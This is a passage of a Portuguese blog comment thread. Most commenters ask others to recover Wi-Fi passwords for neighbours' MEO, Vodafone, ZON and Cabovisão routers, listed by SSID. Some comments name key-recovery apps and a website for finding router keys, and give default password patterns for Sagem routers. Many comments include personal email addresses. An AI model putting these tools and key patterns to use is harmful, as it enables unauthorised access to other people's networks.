    Coisa é neste momento bem mais complicado do que VCS imaginam, simplesmente é necessário estar-se "ligado" à rede em questão MT tempo sem promessas de se conseguir, o maus certo é Não se conseguir nada.
    Comprem um hotspot de um ISP móvel e ficam com o vs problema resolvido ...

    ResponderEliminar
  112. Anónimo19.12.14

    já se consegues arranjar para encontrar senhas d Vodafone?

    ResponderEliminar
  113. Alguem pode ajudar
    VODAFONE DA638D

    ResponderEliminar
  114. Anónimo27.1.15

    alguem pode me ajudar pass

    Cabovisao 30E6

    MEO 852850

    ResponderEliminar
  115. Anónimo29.1.15

    como e constituída as chves dos router adslpt-ab - com quantos números e letras

    ResponderEliminar
  116. boas
    alguem me pode ajuda a descobrir a password desta net
    ADSLPT-AB95863
    cumps
    email jonypower21@hotmail.com

    ResponderEliminar
  117. Anónimo17.2.15

    Alguém conhece um bom dicionário para os routers da zon? Ou digam as pass que sabem sem postarem o SSID só mesmo a pass para eu fazer um dicionário á medida, preciso saber as letras que levam e os números. Ajudem para depois eu puder ajudar todos

    ResponderEliminar
  118. ola alguem sabe a passe;MEU 442C35,445D1F

    ResponderEliminar
  119. BOAS ALGEM PODE DAR A PASSE ,MEU 442C35,445D1F

    ResponderEliminar
  120. boa tarde. sera que alguem me pode ajudar a com algum programa para descobrir senha ADSLPT.AB-89637.
    Tenho o mac enderess. Aguardo uma resposta obridado respondam para Tiagodtmendes@gmail.com

    ResponderEliminar
  121. Anónimo13.3.15

    ALgem pode ajudar com a Meo 442C35,,,Optimus_wifiBC19.ou wifi_oE6F.
    email,nemnamerica@outlook.pt

    ResponderEliminar
  122. Anónimo25.3.15

    ola pessoal do blog eu sou um pouco ``analfabetico`` no que toca a estes programas .por acaso poderias descobrir a passe desta net-VODAFONE-BAETD3 POR FAVOR ajuda-me resposta para o email montoia16@hotmail.com ou para este blog mesmo plz obg

    ResponderEliminar
  123. Pessoal hoje em dia já existem programas até para telemóvel para sacar passes, pelo menos da Meo.. Teem o 'routerkeygen' e o 'penetratepro'. O primeiro funciona melhor. Cumps

    ResponderEliminar
  124. Alguém me pode ajudar nesta?
    MEO-DBA857

    ResponderEliminar
  125. Alguém me ajuda com esta?
    MEO-DBA857

    ResponderEliminar
  126. Alguém me ajuda com esta?
    MEO-DBA857

    ResponderEliminar
  127. Vodafone-242901 era brutal 😄

    ResponderEliminar
  128. tou farto de tentar em varios sites nao consigo ... alguem me ajuda ? :( a Rede é a MEO-C4AD5D

    ResponderEliminar
  129. Alguem ajuda? ... tou farto de tentar não consigo de maneira nenhuma em nenhum site quer dar ...
    A rede é a MEO-C4AD5D

    ResponderEliminar
  130. MEO-C4AD5D
    Nao consigo .. :( tou farto de tentar

    ResponderEliminar
  131. Anónimo7.5.15

    alguem me consegue arranjar a passe da Vodafone-3CCFC5???

    Ficava muito agradecido xD

    ResponderEliminar
  132. Anónimo7.5.15

    Vodafone-3CCFC5

    Alguem me ajude por favor.

    Enviem a passe para o email busuchiha@hotmail.com

    Agradeço bastante à pessoa que me fizer este favor porque no meu quarto a minha net é fraca e a do vizinho no meu quarto apanho os paus todos de net xD

    Abraço

    ResponderEliminar
  133. Anónimo8.5.15

    Pedia ajuda para esta
    ZON-50DA
    Obrigado

    ResponderEliminar
  134. Anónimo8.5.15

    Alguem me ajuda descobrir esta Passe.
    Ficava muito agradecido
    ZON-50DA

    Email: josessenra@hotmail.com

    ResponderEliminar
  135. Anónimo12.5.15

    alguem me poderia dizer a pass de Vodafone-926AE9 agradeco imenso

    ResponderEliminar
  136. Anónimo28.5.15

    Alguem me ajuda descobrir esta Passe?
    ZON-1300

    ResponderEliminar
  137. Anónimo1.6.15

    zon's e vodafone's n dá pá......

    ResponderEliminar
  138. alguem me pode dar a passe da net cabovisao31? ofereco uma recoupensa se funcionar.

    ResponderEliminar
  139. Anónimo16.6.15

    Alguem me pode dar a password desta net? Cabovisao-DEB6

    ResponderEliminar
  140. Anónimo27.6.15

    pff ninguem me consegue descobrir a palavra passe de Vodafone-EAED8F
    agradeço que respondam :)

    ResponderEliminar
  141. Alguem me poderia ajudar nos seguintes routers por favor
    MEO-B202F9 / Vodafone-F55CA1

    ResponderEliminar
  142. Anónimo16.7.15

    Alguém poderá indicar se existe algum padrão para os routers da Cabovisão (instalados durante o ano de 2015)? Há cerca de 2 anos atrás, havia os padrões 2ce412e(a-d)XXXX e d86ce9f1-9)XXXX para routers sagem. Caso as mais recentes passwords incluam o SSID, poderia alguma alma caridosa colocar o padrão que antecede o SSID? Certamente haverá alguém que tenha acesso a um router Cabovisão, não?

    ResponderEliminar
  143. Anónimo20.7.15

    Alguém poderá indicar se existe algum padrão para os routers da Cabovisão (instalados durante o ano de 2015)? Há cerca de 2 anos atrás, havia os padrões 2ce412e(a-d)XXXX e d86ce9f1-9)XXXX para routers sagem. Caso as mais recentes passwords incluam o SSID, poderia alguma alma caridosa colocar o padrão que antecede o SSID? Certamente haverá alguém que tenha acesso a um router Cabovisão, não?

    ResponderEliminar
  144. Olá, alguém de pode ajudar a descobrir a pass desta rede? (Vodafone-9299D1).
    Ficava muito agradecida.

    Obrigada :)

    Email: katerine.llopes@hotmail.com

    ResponderEliminar
  145. Anónimo2.8.15

    Boas, alguem me consegue arranjar alguma senha de wifi para a rede Vodafone-0294B5? agradeco :)

    ResponderEliminar
  146. O SITE PARA THOMSON/MEO E d-link É FODI.ME !!! DA carca de 3 chaves. alguem sabe forma de achar vodafone?

    ResponderEliminar
  147. Anónimo16.8.15

    \Boas, alguém consegue dizer a passe do MEO-33111S e ZON-3740.
    Obrigado

    ResponderEliminar
  148. Anónimo18.8.15

    Alguem me poderia dizer a password de ZON-F020 e Vodafone-493218

    ResponderEliminar
  149. Anónimo22.8.15

    alguém me pode ajudar .... Quem me diz a pass...

    Thomson6A20B4

    ResponderEliminar
  150. lol...continuem....q cambada de cromos......

    ResponderEliminar
  151. Anónimo16.9.15

    será possivel descobrir a palavra pass de vodafone?

    ResponderEliminar
  152. Gostava de conhecer aluem que descobrisse da Vodafone. essa é lixada...

    ResponderEliminar
  153. Boa Noite, seria possível alguém encontrar-me a password da seguinte rede: Zon-D9C0

    Fico-vos extremamente agradecido em avanço!

    ResponderEliminar
  154. Anónimo30.9.15

    Alguém Poderia dar-me a password da seguinte rede? Ficar-vos-ia extremamente agradecido! Zon-D9C0
    Email: Ed-the-error@hotmail.com

    ResponderEliminar
  155. Anónimo1.10.15

    Alguem me descobre a senha de Vodafone-B9D215.Dava imenso jeito.

    Email: gostotemt@gmail.com

    ResponderEliminar
  156. Anónimo4.10.15

    Alguém poderia me ajudar com a passe vodafone-3C13D1
    belzinhoporto@gmail.com
    Agradeço imenso

    ResponderEliminar
  157. Anónimo5.10.15

    É por causa de vizinhos como a maioria das pessoas que comentam nesta página que eu passei a mudar as passwords do router e a filtrar os acessos por MAC Address! Tenham alguma vergonha!

    ResponderEliminar
  158. Anónimo19.10.15

    Boas alguem pode ajudar?
    ZON-8480

    Obrigado

    ResponderEliminar
  159. Anónimo19.10.15

    Alguem pode ajudar?
    ZON-8480

    ResponderEliminar
  160. Anónimo19.10.15

    Boas alguem pode ajudar sff
    ZON-8480
    Obrigado

    ResponderEliminar
  161. Este comentário foi removido pelo autor.

    ResponderEliminar
  162. Boas alguem pode ajudar sff?
    ZON-8480
    Obrigado

    ResponderEliminar
  163. Este comentário foi removido pelo autor.

    ResponderEliminar
  164. Este comentário foi removido pelo autor.

    ResponderEliminar
  165. alguém me poderia dizer a pass da cabovisao-FBEE? Agradecia

    ResponderEliminar
  166. alguém me poderia dizer a pass da cabovisao-FBEE? Agradecia

    ResponderEliminar
  167. Anónimo29.10.15

    NOS-6F70 ; alguém poderia descobrir essa rede internet pfv? ... Zon-B7C0 esta tbm sfv...

    ResponderEliminar
  168. ajuda-me a encontra a senha dessa VADAFONE-A18DCB

    ResponderEliminar
  169. Anónimo2.11.15

    Não consegui instalar o Ubuntu, alguém pode fazer o favor de ver estes? Vodafone-D07D42 e Vodafone-9900B3. Trata se de acesso temporário que vou necessitar este mês
    Obrigado

    ResponderEliminar
  170. Alguém me consigue dizer a passe desta NET ? VadafoneMobileWifi-1E3F68 ?

    ResponderEliminar
  171. Anónimo5.11.15

    Alguém sabe a passou desta NET ? VodafoneMobileWifi-1E3F68

    ResponderEliminar
  172. alguem podia ajurdar me pois eu sou porteiro e trablho noites e fims de semana num predio que tem muitas rdes mas niguem me da a pass é claro mas a que tem mais rede é vodafone240025 como faço para descobrir passe

    ResponderEliminar